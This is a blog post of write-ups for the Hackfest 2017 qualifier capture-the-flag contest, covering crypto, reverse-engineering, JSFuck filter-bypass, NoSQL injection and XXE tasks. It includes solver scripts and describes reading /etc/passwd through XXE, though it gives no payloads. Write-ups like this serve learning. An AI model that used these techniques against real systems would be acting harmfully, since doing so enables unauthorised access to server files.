Hackfest{2k17_online_Quals_writeUps}

1:45:00 PM Unknown 0 Comments


Crypto ,1 pt

My agent intercepted the following message.

4b4241494f4c5e594251471a67196e1e751958495a531a1d58135a1e73621b757559191319641e5866467
5731a411f646e1b78196e191d75751a19686775581a7519787a441a75191a1d4875137f0b590b0b7d 
 

It is encrypted using a homemade cryptographic algorithm! He managed also to find which server encrypted the message! 
You can access it from: nc challenge.hackfest.tn 3001 Can you decrypt the message for us?

The server reads the user input , encrypt it and return a hex string.We have generated it all the possible characters and then wrote another script to decrypt the script , this makes the process more faster than using nc to guess the next hex !

#!/bin/python
#Crypto 1
ch = "!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}"
secret=["41","49","4f","4c","5e","59","42","51","47","1a","67","19","6e","1e","75","19","58","49","5a","53","1a","1d","58","13","5a","1e","73","62","1b","75","75","59","19","13","19","64","1e","58","66","46","75","73","1a","41","1f","64","6e","1b","78","19","6e","19","1d","75","75","1a","19","68","67","75","58","1a","75","19","78","7a","44","1a","75","19","1a","1d","48","75","13","7f","0b","59","0b","0b","7d"]
c=['0b', '08', '09', '0e', '0f', '0c', '0d', '02', '03', '00', '01', '06', '07', '04', '05', '1a', '1b', '18', '19', '1e', '1f', '1c', '1d', '12', '13', '10', '11', '16', '17', '14', '15', '6a', '6b', '68', '69', '6e', '6f', '6c', '6d', '62', '63', '60', '61', '66', '67', '64', '65', '7a', '7b', '78', '79', '7e', '7f', '7c', '7d', '72', '73', '70', '71', '76', '77', '74', '75', '4a', '4b', '48', '49', '4e', '4f', '4c', '4d', '42', '43', '40', '41', '46', '47', '44', '45', '5a', '5b', '58', '59', '5e', '5f', '5c', '5d', '52', '53', '50', '51', '56', '7d']
flag=""
print ch[c.index("49")-1]
for j in range(0,100,2):
 flag+=ch[c.index(secret[j+1])]
 flag+=ch[c.index(secret[j])]
 print flag
 


Web ,1 pt
At the first sight, the task looks weird! nothing works, no response from the server, Maybe a blind SQL injection, but no way !! nothing special. I have launched fuzzer usernames and passwords and we got this message for username = test and password = test





Now we are sure , the vulnerability is in the DB and the username is "admin" , trying some tricks then test the NoSQL injection ! ! and here we go we got the flag! [this reminds me of the IceCTF task ]



Rev ,1 pt
The task is an encrypted python script 


#!/usr/bin/env python
# -*- coding: rot13 -*-

#import sys

o = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'.qrpbqr("rot13")

vs olgrf == fge:
    vd = ynzoqn f: znc(beq, f)
    od = ynzoqn f: ''.wbva(znc(pue, f))
    ohssre = ynzoqn f: f

qrs r(i):

    by = yra(i)
    i = i.yfgevc(o'\0')
    ay = yra(i)

    c, k = 1, 0
    sbe p va vd(i[::-1]):
        k += c * p
        c = c << 8

    e = ''
    juvyr k > 0:
        k, z = qvizbq(k, 58)
        e += o[z]

    erghea (e + o[0] * (by - ay))[::-1]


cevag 'Flag:',
synt = enj_vachg()
vs r(synt) == "2GYhdiSLoJTRvASGXjIHtatb9Kdr":
    cevag ":)"
ryfr:
    cevag ":("

 


Decrypt the code with ROT13 and now we can read the script !


#!/hfe/ova/rai clguba
# -*- pbqvat: ebg13 -*-

#vzcbeg flf

b = '123456789NOPQRSTUWXYZACDEFGHIJKLMnopqrstuvwxzabcdefghijklm'.decode("ebg13")

if bytes == str:
    iq = lambda s: map(ord, s)
    bq = lambda s: ''.join(map(chr, s))
    buffer = lambda s: s

def e(v):

    ol = len(v)
    v = v.lstrip(b'\0')
    nl = len(v)

    p, x = 1, 0
    for c in iq(v[::-1]):
        x += p * c
        p = p << 8

    r = ''
    while x > 0:
        x, m = divmod(x, 58)
        r += b[m]

    return (r + b[0] * (ol - nl))[::-1]


print 'Synt:',
flag = raw_input()
if e(flag) == "2TLuqvFYbWGEiNFTKwVUgngo9Xqe":
    print ":)"
else:
    print ":("


 
After same analysis, the script convert the user inputs into ASCII, use the divmod(ASCII,58) function then get a character of the division "/" and mod() from b variable which is encrypted with ROT(13) and reverse the string!
example !




Google it a while and we got this script to decrypt the msg

import sys

val='i'

from hashlib import sha256

# 58 character alphabet used
alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'.encode("rot13")


if bytes == str:  # python2
    iseq = lambda s: map(ord, s)
    bseq = lambda s: ''.join(map(chr, s))
    buffer = lambda s: s

def b58encode(v):

    origlen = len(v)
    v = v.lstrip(b'\0')
    newlen = len(v)

    p, acc = 1, 0
    for c in iseq(v[::-1]):
        acc += p * c
        p = p << 8

    result = ''
    while acc > 0:
        acc, mod = divmod(acc, 58)
        result += alphabet[mod]

    return (result + alphabet[0] * (origlen - newlen))[::-1]


def b58decode(v):

    if not isinstance(v, str):
        v = v.decode('ascii')

    origlen = len(v)
    v = v.lstrip(alphabet[0])
    newlen = len(v)

    p, acc = 1, 0
    for c in v[::-1]:
        acc += p * alphabet.index(c)
        p *= 58

    result = []
    while acc > 0:
        acc, mod = divmod(acc, 256)
        result.append(mod)

    return (bseq(result) + b'\0' * (origlen - newlen))[::-1]

print 'Input:\t',val
print 'encode' ,b58encode(val)
print 'Base58:\t',b58decode("2GYhdiSLoJTRvASGXjIHtatb9Kdr")
 

The flag is : hackfest{it_was_b58}
PWN , 1 pt
The task accepts only a few characters, and the allowed ones are 0123456789.+-/%*<>!=[]() 
 ,If we could write something with []()! then we can read the flag , we have used an online tool called Jsfuck http://www.jsfuck.com/


and the flag is !



Web, 10pt
An xml format sent to the server ! its obvious XXE xml vulnerability ! similar to the root me task! , doing same tests , adding an entity and execute a cmd ! and we got this 
URL encode of the the request ! . Our request was for ! /etc/passwd




Let's now read the flag !



hackfest{XML_1s_l1k3_vi0l3nc3_1f_1t_d0e5n_T_s0lv3_y0ur_prOblem_y0U_re_n0t_us1n9_en0uGh_0f_iT}

Misc, 1pt
Do we really need a write up for this one ! !? :p just submit the flag XD !
For 10

0 comments: